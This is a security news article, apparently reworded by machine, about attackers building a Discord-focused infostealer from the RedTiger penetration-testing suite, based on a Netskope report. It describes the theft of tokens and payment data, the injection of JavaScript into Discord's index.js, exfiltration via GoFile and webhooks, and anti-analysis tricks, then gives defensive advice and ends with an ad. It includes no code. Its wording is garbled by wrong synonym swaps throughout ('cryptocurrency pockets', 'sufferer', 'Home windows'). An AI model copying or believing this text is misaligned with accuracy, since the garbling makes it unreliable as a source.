Attackers are utilizing the open-source red-team device RedTiger to construct an infostealer that collects Discord account information and fee data.
The malware may steal credentials saved within the browser, cryptocurrency pockets information, and recreation accounts.
RedTiger is a Python-based penetration testing suite for Home windows and Linux that bundles choices for scanning networks and cracking passwords, OSINT-related utilities, Discord-focused instruments, and a malware builder.
Supply: GitHub
RedTiger’s info-stealer part presents the usual capabilities of snatching system data, browser cookies and passwords, crypto pockets information, recreation information, and Roblox and Discord information. It could additionally seize webcam snapshots and screenshots of the sufferer’s display screen.
Though the venture marks its harmful features as “authorized use solely” on GitHub, its free and unconditional distribution and the dearth of any safeguards enable simple abuse.
Supply: GitHub
In keeping with a report from Netskope, risk actors are actually abusing RedTiger’s info-stealer part, primarily for focusing on French Discord account holders.
The attackers compiled RedTiger’s code utilizing PyInstaller to type standalone binaries and gave these gaming or Discord-related names.
As soon as the info-stealer is put in on the sufferer’s machine, it scans for Discord and browser database information. It then extracts plain and encrypted tokens through regex, validates the tokens, and pulls the profile, electronic mail, multi-factor authentication, and subscription data.
Subsequent, it injects customized JavaScript into Discord’s index.js to intercept API calls and seize occasions resembling login makes an attempt, purchases, and even password modifications. It additionally extracts fee data (PayPal, bank cards) saved on Discord.
Supply: Netskope
From the sufferer’s net browsers, RedTiger harvests saved passwords, cookies, historical past, bank cards, and browser extensions. The malware additionally captures desktop screenshots and scans for .TXT, .SQL, and .ZIPÂ information on the filesystem.
After amassing the information, the malware archives the information and uploads them to GoFile, a cloud storage service that enables nameless uploads. The obtain hyperlink is then despatched to the attacker through a Discord webhook, together with the sufferer metadata.
Relating to evasion, RedTiger is well-equipped, that includes anti-sandbox mechanisms and terminating when debuggers are detected. The malware additionally spawns 400 processes and creates 100 random information to overload forensic evaluation.
Supply: Netskope
Whereas Netskope has not shared express distribution vectors for the weaponized RedTiger binaries, some frequent strategies embrace Discord channels, malicious software program obtain websites, discussion board posts, malvertising, and YouTube movies.
Customers ought to keep away from downloading executables or recreation instruments like mods, “trainers,” or “boosters” from unverified sources.
In case you suspect compromise, revoke Discord tokens, change passwords, and reinstall your Discord desktop consumer from the official web site. Additionally, clear saved information from browsers and allow MFA in all places.
46% of environments had passwords cracked, almost doubling from 25% final yr.
Get the Picus Blue Report 2025 now for a complete have a look at extra findings on prevention, detection, and information exfiltration tendencies.
